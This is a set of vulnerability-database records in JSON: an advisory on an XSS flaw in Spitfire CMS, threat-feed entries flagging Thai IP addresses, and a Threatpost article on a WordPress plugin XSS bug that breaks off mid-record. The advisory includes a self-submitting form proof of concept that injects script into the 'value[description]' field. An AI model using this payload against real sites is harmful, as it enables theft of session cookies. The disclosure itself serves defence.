{"id": "SECURITYVULNS:DOC:24299", "bulletinFamily": "software", "title": "XSS vulnerability in Spitfire", "description": "Vulnerability ID: HTB22484\r\nReference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_1.html\r\nProduct: Spitfire\r\nVendor: Claus Muus ( http://spitfire.clausmuus.de/ ) \r\nVulnerable Version: 1.0.336 and Probably Prior Versions\r\nVendor Notification: 08 July 2010 \r\nVulnerability Type: XSS (Cross Site Scripting)\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Medium \r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nUser can execute arbitrary JavaScript code within the vulnerable application.\r\n"tpl_element_settings_action.php" script to properly sanitize user-supplied input in "value[description]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.\r\n\r\nAn attacker can use browser to exploit this vulnerability. The following PoC is available:\r\n\r\n<form action="http://host/cms//edit/tpl_element_settings_action.php" method="post" name="main" >\r\n <input type="hidden" name="action" value="save" />\r\n <input type="hidden" name="value[description]" value='descr2"><script>alert(document.cookie)</script>' />\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n", "published": "2010-07-23T00:00:00", "modified": "2010-07-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24299", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:35", "edition": 1, "viewCount": 87, "enchantments": {"score": {"value": 1.8, "vector": "NONE", "modified": "2018-08-31T11:10:35", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220201615", "OPENVAS:1361412562311220201591", "OPENVAS:1361412562311220201590"]}, {"type": "nessus", "idList": ["NEWSTART_CGSL_NS-SA-2020-0027_CHRONY.NASL", "EULEROS_SA-2020-1615.NASL", "EULEROS_SA-2020-1590.NASL", "ALA_ALAS-2020-1364.NASL", "EULEROS_SA-2020-1591.NASL"]}, {"type": "securelist", "idList": ["SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7"]}, {"type": "mskb", "idList": ["KB980195", "KB2979597", "KB2586448", "KB2559049", "KB2842632", "KB2647516", "KB2496326"]}, {"type": "github", "idList": ["GHSA-R854-96GQ-RFG3"]}, {"type": "amazon", "idList": ["ALAS-2020-1364"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY"]}, {"type": "thn", "idList": ["THN:9F1824BD0EEB6A1695B53AE380D04BF9"]}], "modified": "2018-08-31T11:10:35", "rev": 2}, "vulnersScore": 1.8}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"rst": [{"id": "RST:92B13CDD-9944-3159-A3AD-39D0934A2AEB", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 202.43.34.50", "description": "Found **202[.]43.34.50** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **1**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-10-12T03:00:00.\n IOC tags: **generic**.\nASN 24299: (First IP 202.43.32.0, Last IP 202.43.47.255).\nASN Name \"ISSPAS\" and Organisation \"Internet Solution Service Provider Co Ltd\".\nASN hosts 2061 domains.\nGEO IP information: City \"\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-10-13T00:00:00", "modified": "2020-12-22T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-10-12T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "f3c11cd8d9af621262b0bd423051a33f"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "6d2efbc11f245e93307aaa7bfdc8b70f"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "eff5d8c106204949e1d308eb56f890c4"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "aa44bdcaf268dd90b23edadd7b9d4530"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "b86a73e75e270a30af57de5d6a679f5a"}, {"key": "modified", "hash": "548afddb941bc9ce879976084c7bcc9e"}, {"key": "published", "hash": "367bec30c0ba4b1e1089ea2e16dc01df"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "5327730f50a9455ea4977ce3cb9b5b02"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "41c5bf19a0f2627a2bc8d32e42de83ce05c88ddc7445fde53040bd5333f0bff8", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["202.43.34.50"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.09, "ioc_src": 16.44, "ioc_tags": 0.8, "ioc_total": 1.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Thailand", "region": ""}, "asn": {"cloud": "", "domains": 2061, "firstip": {"netv4": "202.43.32.0", "num": "3391823872"}, "isp": "ISSPAS", "lastip": {"netv4": "202.43.47.255", "num": "3391827967"}, "num": 24299, "org": "Internet Solution Service Provider Co Ltd"}, "threat": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "RST:17DCE094-AAA1-3B58-8737-056BE60EC7FF", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 202.6.26.5", "description": "Found **202[.]6.26.5** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-09-20T03:00:00, Last seen: 2021-09-24T03:00:00.\n IOC tags: **shellprobe**.\nASN 24299: (First IP 202.6.16.0, Last IP 202.6.31.255).\nASN Name \"ISSPAS\" and Organisation \"Internet Solution Service Provider Co Ltd\".\nASN hosts 1980 domains.\nGEO IP information: City \"\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-09-25T00:00:00", "modified": "2021-09-20T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-09-24T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4ad9cffdb40c9fd933b92080f2c7cef3"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "23d9c69782c723c29ddc691828e456f4"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "eff5d8c106204949e1d308eb56f890c4"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "f8c617891c9914ad77d515cc66687fe3"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "230f3bb2409818b8a0548f603eab71c2"}, {"key": "modified", "hash": "cda4e41e464131f53db030d326ffe777"}, {"key": "published", "hash": "69e825cfaae22e14fe8d9f0c71e20d7c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "7804d0d7c594283c7ef18b84e4339474"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "342713f8a32b3db165df73fa7dd81e21"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "9812a2948a228aacab3fbb91fc85be8caf2e0ce2a5f20e6f1f82327075cd2100", "viewCount": 0, "enchantments": {}, "objectVersion": "1.6", "iocType": "ip", "ip": ["202.6.26.5"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.93, "ioc_src": 63.68, "ioc_tags": 0.75, "ioc_total": 44.0}, "tags": ["shellprobe"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Thailand", "region": ""}, "asn": {"cloud": "", "domains": 1980, "firstip": {"netv4": "202.6.16.0", "num": "3389394944"}, "isp": "ISSPAS", "lastip": {"netv4": "202.6.31.255", "num": "3389399039"}, "num": 24299, "org": "Internet Solution Service Provider Co Ltd"}, "threat": [], "cvss2": {}, "immutableFields": [], "cvss3": {}}, {"id": "RST:B11EA23C-2C76-341E-BF0E-A41AD2E46B9E", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 202.6.16.89", "description": "Found **202[.]6.16.89** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **3**.\n First seen: 2020-09-06T03:00:00, Last seen: 2021-07-20T03:00:00.\n IOC tags: **generic**.\nASN 24299: (First IP 202.6.16.0, Last IP 202.6.31.255).\nASN Name \"ISSPAS\" and Organisation \"Internet Solution Service Provider Co Ltd\".\nASN hosts 2291 domains.\nGEO IP information: City \"\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-07-21T00:00:00", "modified": "2020-09-06T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-07-20T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "e3b00c83643dd141fb733fc55ea21fee"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "23e3728c721c37ee0477078d77cbc598"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "eff5d8c106204949e1d308eb56f890c4"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "118596489b2e06ecd34f143a4dafc57b"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "e8c3a5d10afa60ec9872f2de7761317b"}, {"key": "modified", "hash": "8b9d824e654713d897d59957e2bfd19e"}, {"key": "published", "hash": "c93d7d5564131b755d6cba297eead900"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "782db03129e48832fff867fbfe71b958"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "c0749e172683ecc0747cfe5d7e8717762e41add248ba550da7ef294f9a510ade", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["202.6.16.89"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.08, "ioc_src": 54.78, "ioc_tags": 0.8, "ioc_total": 3.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Thailand", "region": ""}, "asn": {"cloud": "", "domains": 2291, "firstip": {"netv4": "202.6.16.0", "num": "3389394944"}, "isp": "ISSPAS", "lastip": {"netv4": "202.6.31.255", "num": "3389399039"}, "num": 24299, "org": "Internet Solution Service Provider Co Ltd"}, "immutableFields": [], "threat": []}, {"id": "RST:347B7F59-98FF-30E6-8155-98851909488B", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 202.43.45.181", "description": "Found **202[.]43.45.181** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **4**.\n First seen: 2020-01-30T03:00:00, Last seen: 2020-10-05T03:00:00.\n IOC tags: **generic**.\nASN 24299: (First IP 202.43.32.0, Last IP 202.43.47.255).\nASN Name \"ISSPAS\" and Organisation \"Internet Solution Service Provider Co Ltd\".\nASN hosts 2635 domains.\nGEO IP information: City \"\", Country \"Thailand\".\nIn according to RST Threat Feed the IP is related to **www.n2plus.co.th,n2plus.co.th** malicious domains.\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-03-05T00:00:00", "modified": "2020-01-30T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-10-05T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "f4ab906f2ca6c1b3af44ed93939cbf03"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "5d81d2e95c972f02a8cfeea6c961cd43"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "eff5d8c106204949e1d308eb56f890c4"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "5db08830eb87c9de92d0d152153e8ffc"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "33e7235ad2a02ca2781d3e4792b2b2cb"}, {"key": "modified", "hash": "c866da6f323859331f3b7ee58ded7258"}, {"key": "published", "hash": "c11e53af4422bbcd8c009d0df9727b6e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "0ef4c5b316b8eb94349deca25a98e9f6"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "0f2019efcfd93db7525a31a9b5f0058468d999630acff51bbb8dd3bdc1953961", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["202.43.45.181"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.11, "ioc_src": 55.84, "ioc_tags": 0.8, "ioc_total": 4.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Thailand", "region": ""}, "asn": {"cloud": "", "domains": 2635, "firstip": {"netv4": "202.43.32.0", "num": "3391823872"}, "isp": "ISSPAS", "lastip": {"netv4": "202.43.47.255", "num": "3391827967"}, "num": 24299, "org": "Internet Solution Service Provider Co Ltd"}, "threat": []}, {"id": "RST:C7EBDC1A-E542-37CE-8F18-1E6C5E94656A", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 202.43.45.111", "description": "Found **202[.]43.45.111** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **49**.\n First seen: 2020-12-01T03:00:00, Last seen: 2020-12-04T03:00:00.\n IOC tags: **generic**.\nASN 24299: (First IP 202.43.32.0, Last IP 202.43.47.255).\nASN Name \"ISSPAS\" and Organisation \"Internet Solution Service Provider Co Ltd\".\nASN hosts 2701 domains.\nGEO IP information: City \"\", Country \"Thailand\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2020-12-06T00:00:00", "modified": "2020-12-01T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-12-04T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "58b9b2694785c2428b3511e3f00e90aa"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "f8519b126411b558fa5979dec5acc01e"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "eff5d8c106204949e1d308eb56f890c4"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "467a4d31cd41373e1f9d44bfee42d829"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "a62d0efe64840abcdca9f10997a04599"}, {"key": "modified", "hash": "a91ca00a35cec03d1ee388757db025c5"}, {"key": "published", "hash": "9e00841e391ff4251806eb8c3141fedb"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "ec6f221922f984aa8b02a70065813bb8"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "fd4d1e4ad3d451fcc9f8244f267bc5a04284d37560faa64b3d642ab48da97cb8", "viewCount": 0, "enchantments": {}, "objectVersion": "1.3", "iocType": "ip", "ip": ["202.43.45.111"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.95, "ioc_src": 64.84, "ioc_tags": 0.8, "ioc_total": 49.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Thailand", "region": ""}, "asn": {"cloud": "", "domains": 2701, "firstip": {"netv4": "202.43.32.0", "num": "3391823872"}, "isp": "ISSPAS", "lastip": {"netv4": "202.43.47.255", "num": "3391827967"}, "num": 24299, "org": "Internet Solution Service Provider Co Ltd"}, "threat": []}], "threatpost": [{"id": "THREATPOST:7C8F5D2495C8D268805D08DB5A40072F", "hash": "dedbf4a726fe55d8edf643bb7d39404a", "type": "threatpost", "bulletinFamily": "info", "title": "Reservation System Fixes Easy-to-Exploit XSS Bug", "description": "An easy-to-exploit bug impacting the WordPress plugin ReDi Restaurant Reservation allows unauthenticated attackers to pilfer reservation data and customer personal identifiable information by simply submitting a malicious snippet of JavaScript code into the reservation comment field.\n\nThe bug affects ReDi Restaurant Reservation versions prior to 21.0307, with a patched (v. 21.0426) version of the plugin [available for download](<https://reservationdiary.eu/download-2/>). The vulnerability ([CVE-2021-24299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24299>)) is a persistent cross-site scripting (XSS) bug. The flaw is not yet rated.\n\nA public proof-of-concept disclosure of the ReDi bug was released Sunday with the official public disclosure delayed a month \u201cdue to the severity of the vulnerability,\u201d according to Bastijn Ouwendijk, credited for finding the bug. The researcher alerted the makers of the plugin, Catz Soft, on April 15. A fix was available on April 25.[](<https://threatpost.com/newsletter-sign/>)\u201c[The bug] makes it possible for malicious attackers to, for example, steal the plugin API-key and potentially steal information about customers that made reservations, steal cookies or other sensitive data,\u201d according Ouwendijk in a technical breakdown and proof of concept of [the bug posted Sunday](<https://bastijnouwendijk.com/cve-2021-24299/>).\n\nLeaky application programming interface (API) keys have been a popular target of hackers in dozens of attacks and been responsible for even more vendor fixes. [Twitter](<https://threatpost.com/twitter-bug-api-keys-tokens/159591/>), Imperva\u2019s [Cloud Web Application Firewall](<https://threatpost.com/imperva-firewall-breach-api-keys-ssl-certificates/147743/>) and recently 30 popular [mHealth apps](<https://threatpost.com/mhealth-apps-millions-cyberattacks/163966/>) have each grappled with insecure API key issues.\n\n## Easily Exploit Bug\n\nA review of the ReDi Restaurant Reservation plugin bug shows how an adversary can launch an attack simply by using a JavaScript payload \u2013 one that has fewer than 250 characters \u2013 to exploit the XSS bug.\n\n\u201cHow does this vulnerability work? The plugin provides users the functionality to book a reservation for the restaurant. A user just has to visit the reservation page,\u201d the researcher explained. Next, the attacker makes a reservation and in the \u201cComment\u201d field inputs the malicious JavaScript. Because the text and JavaScript code is not sanitized, or rendered harmless, the user comment data \u201cis processed and saved to local variables.\u201d\n\n\u201cNext, the saved variables are pushed to the database. Also note here that variables are not sanitized or validated before being pushed to the database. This means the strings we submit through the form for the variables UserName, UserPhone, UserEmail and UserComments will be saved to the database without changes,\u201d the researcher wrote.\n\nThe payload is executed when a WordPress site administrator or restaurant owner views the reservations through the platform\u2019s own webpage.\n\n\u201cThis is a webpage where you can view the reservations made for a specific time period. This page isn\u2019t a WordPress webpage, but an external page that is loaded within an iframe, as can be seen in the PHP code,\u201d the researcher said.\n\nPHP (Hypertext Preprocessor) is scripting language used for generating dynamic content executed on a web server.\n\n\u201cThe url that is loaded within the iframe takes the url https[://]upcoming.reservationdiary[.]eu/Entry/ and appends it with the API-key that is registered in your ReDi Restaurant Reservation plugin. When visiting this url, it shows all the made reservations for a specific time period,\u201d Ouwendijk wrote.\n\nThe publishers of the plugin, Catz Soft, did not reply to requests for comments. The researcher, Ouwendijk, did not reply to specific technical questions regarding this bug.\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on**** ****[Wed, June 9 at 2:00 PM EDT](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)****. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and ****[Register HERE](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**** ****for free.**\n", "published": "2021-05-24T19:33:45", "modified": "2021-05-24T19:33:45", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://threatpost.com/reservation-system-easy-to-exploit-xss-bug/166414/", "reporter": "Tom Spring", "references": ["https://reservationdiary.eu/download-2/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24299", "https://threatpost.com/newsletter-sign/", "https://bastijnouwendijk.com/cve-2021-24299/", "https://threatpost.com/twitter-bug-api-keys-tokens/159591/", "https://threatpost.com/imperva-firewall-breach-api-keys-ssl-certificates/147743/", "https://threatpost.com/mhealth-apps-millions-cyberattacks/163966/", "https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar", "https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar"], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-05-25T07:56:25", "history": [{"bulletin": {"id": "THREATPOST:7C8F5D2495C8D268805D08DB5A40072F", "hash": "8471d459bd3deb751b0d5df8a2a677b0", "type": "threatpost", "bulletinFamily": "info", "title": "Reservation System Fixes Easy-to-Exploit XSS Bug", "description": "An easy-to-exploit bug impacting the WordPress plugin ReDi Restaurant Reservation allows unauthenticated attackers to pilfer reservation data and customer personal identifiable information by simply submitting a malicious snippet of JavaScript code into the reservation comment field.\n\nThe bug affects ReDi Restaurant Reservation versions prior to 21.0307, with a patched (v. 21.0426) version of the plugin [available for download](<https://reservationdiary.eu/download-2/>). The vulnerability ([CVE-2021-24299](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24299>)) is a persistent cross-site scripting (XSS) bug. The flaw is not yet rated.\n\nA public proof-of-concept disclosure of the ReDi bug was released Sunday with the official public disclosure delayed a month \u201cdue to the severity of the vulnerability,\u201d according to Bastijn Ouwendijk, credited for finding the bug. The researcher alerted the makers of the plugin, Catz Soft, on April 15. A fix was available on April 25.[](<https://threatpost.com/newsletter-sign/>)\u201c[The bug] makes it possible for malicious attackers to, for example, steal the plugin API-key and potentially steal information about customers that made reservations, steal cookies or other sensitive data,\u201d according Ouwendijk in a technical breakdown and proof of concept of [the bug posted Sunday](<https://bastijnouwendijk.com/cve-2021-24299/>).\n\nLeaky application programming interface (API) keys have been a popular target of hackers in dozens of attacks and been responsible for even more vendor fixes. [Twitter](<https://threatpost.com/twitter-bug-api-keys-tokens/159591/>), Imperva\u2019s [Cloud Web Application Firewall](<https://threatpost.com/imperva-firewall-breach-api-keys-ssl-certificates/147743/>) and recently 30 popular [mHealth apps](<https://threatpost.com/mhealth-apps-millions-cyberattacks/163966/>) have each grappled with insecure API key issues.\n\n## Easily Exploit Bug\n\nA review of the ReDi Restaurant Reservation plugin bug shows how an adversary can launch an attack simply by using a JavaScript payload \u2013 one that has fewer than 250 characters \u2013 to exploit the XSS bug.\n\n\u201cHow does this vulnerability work? The plugin provides users the functionality to book a reservation for the restaurant. A user just has to visit the reservation page,\u201d the researcher explained. Next, the attacker makes a reservation and in the \u201cComment\u201d field inputs the malicious JavaScript. Because the text and JavaScript code is not sanitized, or rendered harmless, the user comment data \u201cis processed and saved to local variables.\u201d\n\n\u201cNext, the saved variables are pushed to the database. Also note here that variables are not sanitized or validated before being pushed to the database. This means the strings we submit through the form for the variables UserName, UserPhone, UserEmail and UserComments will be saved to the database without changes,\u201d the researcher wrote.\n\nThe payload is executed when a WordPress site administrator or restaurant owner views the reservations through the platform\u2019s own webpage.\n\n\u201cThis is a webpage where you can view the reservations made for a specific time period. This page isn\u2019t a WordPress webpage, but an external page that is loaded within an iframe, as can be seen in the PHP code,\u201d the researcher said.\n\nPHP (Hypertext Preprocessor) is scripting language used for generating dynamic content executed on a web server.\n\n\u201cThe url that is loaded within the iframe takes the url https[://]upcoming.reservationdiary[.]eu/Entry/ and appends it with the API-key that is registered in your ReDi Restaurant Reservation plugin. When visiting this url, it shows all the made reservations for a specific time period,\u201d Ouwendijk wrote.\n\nThe publishers of the plugin, Catz Soft, did not reply to requests for comments. The researcher, Ouwendijk, did not reply to specific technical questions regarding this bug.\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on**** ****[Wed, June 9 at 2:00 PM EDT](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)****. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. Join the discussion and ****[Register HERE](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**** ****for free.**\n", "published": "2021-05-24T19:33:45", "modified": "2021-05-24T19:33:45", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://threatpost.com/reservation-system-easy-to-exploit-xss-bug/166414/", "reporter": "Tom Spring", "references": ["https://reservationdiary.eu/download-2/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24299", "https://threatpost.com/newsletter-sign/", "https://bastijnouwendijk.com/cve-2021-24299/", "https://threatpost.com/twitter-bug-api-keys-tokens/159591/", "https://threatpost.com/imperva-firewall-breach-api-keys-ssl-certificates/147743/", "https://threatpost.com/mhealth-apps-millions-cyberattacks/163966/", "https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar", "https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar"], "cvelist": ["CVE-2021-24299"], "immutableFields": [], "lastseen": "2021-05-24T19:39:04", "history": [], "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24299"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:FD6CE00B-8C5F-4180-B648-F47B37303670"]}, {"type": 